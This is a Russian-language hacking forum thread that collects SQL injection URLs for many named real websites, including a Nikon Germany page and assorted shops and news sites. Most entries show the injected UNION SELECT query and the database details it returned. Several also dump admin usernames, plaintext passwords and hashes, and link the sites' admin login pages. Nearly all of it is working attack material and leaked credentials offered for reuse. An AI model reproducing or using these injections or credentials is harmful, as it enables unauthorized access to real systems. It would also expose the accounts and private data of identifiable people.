SQL Инъекции

sibkray_site@localhost
5.0.45
sibkray_site

Таблы

 

https://www2.nikon.de/school.php?id=0138+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7/*
5.0.32-Debian_7etch10-log:nikon@localhost:nikon
куча таблиц, заинтересовала auth_user: user_id, username, password, perms.
Сдампим данные:

Code:

9e3cc66e1d74a0146cd1894b467c0d78:Werner:Jobs2003:Stellenangebote

650197885626a3fe3fab2acce484184a:katthoefer:ply44bs:User-Verwaltung,Events,Stellenangebote,Workshops,Händler,News,Presse,Händlersuche aktualisieren,Produktbild-Datenbank,Abonnenten verwalten,Protokolle verwalten,Kontakt,NPS,Leihgeräte,Testergebnisse,Händlerliste Aktionen

a38407df0c41b6131a06e5a15c3d6878:Jasper:nrap2348go:Events,Workshops

24565ae53b131bcbfa6be713e73e4195:Jacobs:t77jpftspw:User-Verwaltung,Events,Stellenangebote,Workshops,Händler,News,Presse,Service,Newsletter,Händlersuche aktualisieren,Produktbild-Datenbank,Abonnenten verwalten,Protokolle verwalten,Kontakt,NPS,Leihgeräte,Testergebnisse,Newsletter versenden,Datei-Anhänge verwalten

89059f997e1f01298b0ce8b79fdd6a37:Exner:nvd23r904:Events,Workshops

04aa721901ff6d81d06c1385d731de75:student:4hvt7cd:Events,Workshops,Produktbild-Datenbank,Testergebnisse

cf7e1c0ca503b386b34d61b4bfdd7744:Sperwer:R2dnc:Events

22e91f6b1eb5da862837286f3e8ffb14:kickingereder:jnd242go:User-Verwaltung,Events,Stellenangebote,Workshops,Händler,News,Presse,Service,Newsletter,Händlersuche aktualisieren,Produktbild-Datenbank,Abonnenten verwalten,Protokolle verwalten,Kontakt,NPS,Leihgeräte,Testergebnisse,Newsletter versenden,Datei-Anhänge verwalten

f0a7962c9acfa9b994569bc675b2e0a0:Deines:3sdg339z:Events,Workshops

так же есть таблица: auth_user_md5, с такими же полями. Дамп

Code:

c14cbf141ab1b7cd009356f555b607dc:kris:098f6bcd4621d373cade4e832627b4f6:admin
135ff2008ba9e9e21084c045d0c5825d:nikon:d81e22674cc2c1c62b84500e436e6ad8:admin

 

http://www.zababahai.ru/page/news-read.php?news=-12+UnIoN+SeLecT+1,table_name,3,4,5,6+from+information_schema.tables+/*+
1::[email protected]::100::b358721da28f6306c17fc80e4a7eaa7d3abe300a

http://woman1.ru/vote.php?nom=-4'+union+select+1,2,table_name,4,5,6,7+from+information_schema.tables+/*+

http://board.ebashmetall.ru/index.php?catid=-29+union+select+1,table_name,3,4,5+from+information_schema.tables+limit+10,100+/*+

http://avtoton.net/?id=cat&type=-58+union+select+1,concat_ws(0x3a3a,login,pass)+from+users+/*+
avtoton::080383
http://avtoton.net/admin/

http://kraskolizey.com/books-describe.php?id=-4+union+select+1,user_name,3,password,5,6,7,8+from+users+limit+5,1+/*+
admin::neadmin
kadmin::kolizey
webmaster::webmaster
http://kraskolizey.com/admin/

 

http://www.wpcsd.org/education/components/form/default.php?sectiondetailid=118+and+substring(version(),1,1)=5


http://longisland.newsday.com/schools/school.php?id=774940+and+substring(version(),1,1)=5/*

 

http://plintu.com/classifide_ad.php?item_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,CONCAT(user_name,char(58),password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54/**/FROM/**/admin/**/LIMIT/**/0,1/*

admin:$1$cOzWWNQQ$4S9o1bLzmq1MIhAcSwUdR.

==============================
jokester:
не подскажешь что мне нужно сделать, что-бы ты не переписывал тему сначала?

Неужели так трудно чекать скули на антибояне?
http://bestquest.info/sql/
bid4tackle.com БОЯН

Я устал удалять и править твои посты, не будешь соблюдать правила, буду просить о бане

 

http://www.1mileup.com/links.asp?CatId=-99999%20UNION%20SELECT%20null,accesslevel,null,null,user_name,%205%20,password,null%20FROM%20Users

 

http://www.fibercity.ru/?q=art&id=-44+union+select+1,2,3,concat_ws(0x3a3a,login,pass)+from+users+/*+
superAdmin::cce37934e8857d4fab68c3bfc4946662

http://www.peskostruyka.biz/index.php?ID=-2+union+select+1,2,database(),4,5,6,7,8,9,10,11+/*+
z105024_pesk

http://allina.ru/tovar.php?tovar=65&tovid=-247+UnIoN+SeLecT+1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+/*+
z82987_allina

 

[PR]5
www.badtasterecords.se

Code:

http://www.badtasterecords.se/bands.asp?id=-1+union+select+concat_ws(0x203a20,version(),database(),user(),@@version_compile_os)--

version()4.0.27-standard
database()badtaste_d
user()[email protected]
os pc-linux-gnu


______________________

[PR]3
www.podarunok.net

Code:

http://www.podarunok.net/consulting/article/?id=-1+union+select+1,2,concat_ws(0x203a20,version(),database(),user(),@@version_compile_os),4,5,6,7,8--

version()4.1.22-log
database()podarunok
user()podarunok@beta
os portbld-freebsd5.5

______________________
[PR]4
www.frw.ca

Code:

http://www.frw.ca/rouge.php?ID=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x203a20,version(),database(),user())--

version()4.0.18-Max
database()frw
user()frw@web49

______________________

[PR]2
www.halcyonpix.com

Code:

http://www.halcyonpix.com/view.php?id=-42+union+select+1,concat_ws(0x203a20,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12--

version()4.1.22-MAX-LOG
database()HALCYONPIX1
user()[email protected]
os UNKNOWN-LINUX-GNU


______________________
[PR]1
oldshipbar.ru

Code:

http://oldshipbar.ru/review.php?id=-1+union+select+1,concat_ws(0x203a20,version(),database(),user(),@@version_compile_os),3--

version()5.0.67-LOG
database()U56014_OLDSHIP
user()[email protected]
os UNKNOWN-FREEBSD6.1

[tables]

Code:

http://oldshipbar.ru/review.php?id=-1+union+select+1,table_name,3+from+information_schema.tables--

 

[PR 2]

Code:

http://www.funkhair.com.au/online_shop/stock.php?id=-61+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15--

5.0.51-2.dotdeb.0-log:funk_hair:sqluser@localhost

data from table 'mysql.user'

Code:

http://www.funkhair.com.au/online_shop/stock.php?id=-61+union+select+1,concat_ws(0x3a,user,password,file_priv),3,4,5,6,7,8,9,10,11,12,13,14,15+from+mysql.user--

data from table 'user'

Code:

http://www.funkhair.com.au/online_shop/stock.php?id=-61+union+select+1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.columns+where+table_name=0x75736572
http://www.funkhair.com.au/online_shop/stock.php?id=-61+union+select+1,concat_ws(0x3a,id,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+user

id:usernameassword

http://www.funkhair.com.au/login.php

 

_http://cititour.com/NYC_Movies/index.php?id=-1+union+select+group_concat(table_name)+from+information_schema.tables--
version 5.x.x.x

_http://www.bhnyc.com/category.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11,12, 13--
version 4.x.x.x

_http://www.arcadevillage.com/agora/displaybest2.php?id=-1+union+select+version(),2--
version 5.x.x.x

_http://www.nycglass.com/index.php?id=-1+union+select+1,2,concat_ws(0x3b,name,pass),4,5,6 ,7+from+users--
хеш трудный(

_http://www.armofthesea.org/repertoire.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12, 13--
4.x.x.x

http://rss.skyride.com/item.php?id=-1+union+select+1,concat_ws(0x3b,user,password),3,4 ,5,6+from+mysql.user--

 

_http://www.info.pulawy.pl/news.php?id=-3048+union+select+1,concat_ws(0x3b,pass,user()),3,4,5,6,7,8,9,10,11,12,13+from+users--

 

[PR 3]

Code:

http://www.soulshoes.co.nz/products.php?id=-3+union+select+1,2,concat_ws(0x3a,version(),database(),user())

4.0.26:soulshoes_co_nz:soulshoe@localhost
=====================
[PR 3]

Code:

http://www.wineaway.com.au/app/article_view.php?id=-000006+union+select+1,2,3,convert(concat_ws(0x3a,version(),database(),user())+using+latin1),5,6,7,8,9,10

5.0.18-nt:_production_app:root@localhost

data from table 'mysql.user'

Code:

http://www.wineaway.com.au/app/article_view.php?id=-000006+union+select+1,2,3,convert(concat_ws(0x3a,user,password,file_priv)+using+latin1),5,6,7,8,9,10+from+mysql.user

=====================
[PR 3]

Code:

http://www.sktm.in/product_detailed_search.php?id=-915+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--&searchpage=0&sql1=product_new=0&newarr=n

5.0.22-log:sktm:sktm@localhost

data from table 'mysql.user'

Code:

http://www.sktm.in/product_detailed_search.php?id=-915+union+select+1,2,3,4,concat_ws(0x3a,user,password,file_priv),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+mysql.user--&searchpage=0&sql1=product_new=0&newarr=n

=====================
[PR 2]

Code:

http://www.loddonheatingcooling.com.au/catalogue/stock.php?id=-40+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15

5.0.51-2.dotdeb.0-log:loddon_heating:sqluser@localhost

data from table 'mysql.user'

Code:

http://www.loddonheatingcooling.com.au/catalogue/stock.php?id=-40+union+select+1,concat_ws(0x3a,user,password,file_priv),3,4,5,6,7,8,9,10,11,12,13,14,15+from+mysql.user

data from table 'user'

Code:

http://www.loddonheatingcooling.com.au/catalogue/stock.php?id=-40+union+select+1,concat_ws(0x3a,id,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+user

http://www.loddonheatingcooling.com.au/login.php
=====================
[PR 0]

Code:

http://blossomsflorists.biz/product.php?id=-32+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11

4.1.22-standard:blossom_shop:blossom_gordon@localhost

 

http://www.nordestfm.ro/index.php?page=6&&act=news&cid=3+AND+SUBSTRING((version()),1,1)=x


Version : 4.1.22-standard-log
User : nordestf_ne@localhost
Database : nordestf_neG
Os : pc-linux-gnu

 

Code:

http://www.komissar.ru/news/?nid=-618+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5--

[email protected]:5.0.32-Debian_7etch1-log:skuns_main
TABLES:

Code:

http://www.komissar.ru/news/?nid=-618+union+select+1,2,3,group_concat(table_name,0x3C62723E),5+from+information_schema.tables--

Code:

CHARACTER_SETS
,COLLATIONS
,COLLATION_CHARACTER_SET_APPLICABILITY
,COLUMNS
,COLUMN_PRIVILEGES
,KEY_COLUMN_USAGE
,ROUTINES
,SCHEMATA
,SCHEMA_PRIVILEGES
,STATISTICS
,TABLES
,TABLE_CONSTRAINTS
,TABLE_PRIVILEGES
,TRIGGERS
,USER_PRIVILEGES
,VIEWS
,articles
,articles_view
,banners
,catalog_desc
,catalog_main
,catalog_setup
,catalog_trans
,catalog_value
,company_info
,content
,content_admin
,content_images
,content_main
,customers
,faq
,faq_view
,gallery_folders
,gallery_photos
,gallery_view
,guest_book
,headers
,ip_list
,languages
,news
,news_view
,order_description
,page_banners
,page_banners_logic
,polls_questions
,polls_topics
,titles

PR:3
ТИЦ:100

 

PR 1

Code:

http://www.aronis.kiev.ua/a-news/news.php?id=-1+union+select+1,2,3,4,5,6,7,8--

4.1.22-standard-log


PR 1

Code:

http://japanmoto.com.ua/news.php?id=-1+union+select+1,2,3,4--

5.0.67-log


PR 3

Code:

http://www.gc.ua/en/news.php?id=-568+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15

,16,17,18,19,20--

5.0.51a-community


PR 4

Code:

http://www.franchising.org.ua/a-news/news.php?id=-183+union+select+1,2,3,4,5,6,7,8,9,10--

5.0.32-Debian_7etch10-log


PR 3

Code:

http://www.kiosks.com.ua/news.php?id=-183+union+select+1,2,3,4,5,6,7,8--

4.1.22-log


PR 2

Code:

http://bis-land.ru/news.php?id=-183+union+select+1,2,3,4,5,6,7--

5.0.51a-community

 

Code:

http://www.dok3.ru/individ.php?id=-1+union+select+1,table_name,3,4+from+information_schema.tables--

 

http://www.eutempusglobe.org/news.php?id=-23+union+select+1,version(),database(),user(),5,6,7--

5.0.51a-community
cibs1_eutempusglobe
cibs1_eutempusgl@localhost

 

Code:

http://doprabota.ru/viewcompany.php?eid=2467%27+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+admin+limit+1,1/*

version():5.0.27-log
database():lj_mausiru
user():lj_mausiru@localhost

Code:

http://doprabota.ru/viewcompany.php?eid=2467%27+union+select+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+admin+limit+1,1/*

admin:Gj,tlf37

Code:

http://doprabota.ru/admin/

 

Code:

http://www.vivatoshka.ru/article.php?id=-1+union+select+1,2,table_name+from+information_schema.tables--

 

Code:

http://www.avtoschool.okis.ru/admin/index.php?act=edit_page&id=-17'+union+select+1,2,3,4,5,6,7+--+

Пасс : 7a30b2702d

Версия: 4.1.25-log
Имя: avtoschool_F@localhost